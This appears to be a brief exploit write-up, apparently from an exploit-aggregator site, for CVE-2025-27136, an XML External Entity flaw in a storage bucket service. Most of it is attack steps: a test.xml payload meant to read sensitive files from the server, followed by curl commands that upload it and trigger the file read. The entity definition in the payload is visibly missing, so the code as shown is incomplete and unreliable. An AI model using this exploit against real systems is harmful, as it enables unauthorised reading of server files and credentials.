Share
## https://sploitus.com/exploit?id=41F7E8A2-526B-58BF-8CAA-51CF90078F71
# CVE-2025-27136
Exploiting an XML External Entity (XXE) Vulnerability.

### Use XML Payload to Grab Sensitive Files (PoC)

*test.xml*
```


]>

  &xxe;

```

Use curl to upload *test.xml* from our local machine to the bucket.
```
curl -X PUT http://127.0.0.1:PORT/TB1 -H "Content-Type: application/xml" -d @test.xml
```
Trigger the Exploit & Grab the File
```
curl http://127.0.0.1:PORT/TB1?location
```